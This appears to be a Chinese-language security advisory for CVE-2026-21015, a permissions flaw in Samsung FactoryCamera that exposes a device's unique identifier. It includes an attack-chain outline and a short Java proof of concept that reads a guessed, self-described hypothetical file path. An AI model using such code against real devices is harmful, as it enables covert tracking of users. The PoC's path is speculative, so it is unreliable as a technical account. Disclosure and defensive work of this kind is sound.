CVE-2026-21015 FactoryCamera权限不当致信息泄露

漏洞信息

漏洞编号

CVE-2026-21015

漏洞类型

权限管理不当

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Samsung FactoryCamera

漏洞概述

三星FactoryCamera应用程序在SMR May-2026 Release 1之前的版本中，存在严重的默认权限配置不当漏洞。该漏洞主要涉及对敏感数据的访问控制缺失，允许本地低权限攻击者利用此缺陷，无需用户交互即可直接访问设备内部的唯一标识符信息。此问题破坏了系统的数据隔离机制，可能导致敏感隐私信息被恶意应用窃取，建议用户尽快安装官方安全更新以修复此风险。

技术细节

该漏洞属于典型的权限配置不当类漏洞。在受影响的Samsung FactoryCamera应用版本中，用于存储设备唯一标识符的文件或目录被设置了过于宽松的默认权限（例如允许全局可读或组内用户可读）。根据CVSS 3.1向量分析，攻击向量为本地（AV:L），意味着攻击者必须拥有设备的本地访问权限，无法通过网络远程触发。由于权限要求较低（PR:L），攻击者无需获得Root权限或高权限，仅需运行一个普通的恶意应用程序即可触发漏洞。在利用方式上，攻击者通过Android系统的文件访问API，尝试直接读取FactoryCamera私有目录下的特定文件。由于系统未能正确校验调用者的身份权限或默认权限设置错误，读取操作成功执行，导致设备唯一标识符泄露。此漏洞仅影响机密性（C:H），不会导致系统完整性或可用性受损，但泄露的唯一标识符可能被用于追踪用户或进行进一步的关联攻击。

攻击链分析

STEP 1

侦察

攻击者确认目标设备上安装了存在漏洞的FactoryCamera应用版本（早于SMR May-2026 Release 1）。

STEP 2

初始访问

攻击者在目标设备上安装一个看似无害的恶意应用程序，或者通过物理接触设备获得本地低权限访问（AV:L, PR:L）。

STEP 3

漏洞利用

恶意应用程序尝试读取FactoryCamera应用私有的存储目录，由于默认权限配置不当，系统未拦截该读取请求。

STEP 4

数据泄露

攻击者成功读取并获取设备唯一标识符，导致用户隐私信息泄露（C:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-21015: Incorrect Default Permissions
// This demonstrates reading a sensitive file due to misconfigured permissions.

import java.io.*;

public class CVE202621015_PoC {
    public static void main(String[] args) {
        // Hypothetical path where the unique identifier is stored
        String vulnerableFilePath = "/data/data/com.sec.factory.camera/files/unique_identifier.dat";
        
        try {
            File file = new File(vulnerableFilePath);
            
            // Check if file exists
            if (file.exists()) {
                System.out.println("[+] Target file found. Attempting to read...");
                
                // Attempt to read the file content
                BufferedReader reader = new BufferedReader(new FileReader(file));
                String line;
                while ((line = reader.readLine()) != null) {
                    System.out.println("[+] Leaked Unique Identifier: " + line);
                }
                reader.close();
                System.out.println("[+] Exploit successful.");
            } else {
                System.out.println("[-] File not found at path: " + vulnerableFilePath);
            }
        } catch (IOException e) {
            System.out.println("[-] Error accessing file. Permission denied or path incorrect.");
            e.printStackTrace();
        }
    }
}

影响范围

Samsung FactoryCamera < SMR May-2026 Release 1

防御指南

临时缓解措施

在未安装官方补丁之前，用户应尽量避免授予不必要的文件访问权限给第三方应用，并不要在设备上安装来源不明的软件，以降低本地恶意软件读取敏感数据的风险。